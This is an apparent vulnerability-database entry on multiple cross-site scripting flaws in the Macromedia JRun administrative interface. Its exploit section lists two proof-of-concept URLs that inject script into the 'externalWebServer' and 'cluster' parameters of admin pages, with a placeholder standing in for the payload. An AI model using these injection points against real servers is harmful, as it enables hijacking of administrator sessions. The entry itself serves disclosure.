• info
• discussion
• exploit
• solution
• references

Macromedia JRun Administrative Interface Multiple Cross-Site Scripting Vulnerabilities

The following proof of concept requests have been provided:

http://www.example.com:8000/server/<your server>/webserver/webserverlist.jsp?action=start&externalWebServer=DefaultDomain%3aservice%3d<script code>

http://www.example.com:8000/clusterframe.jsp?cluster=<script code>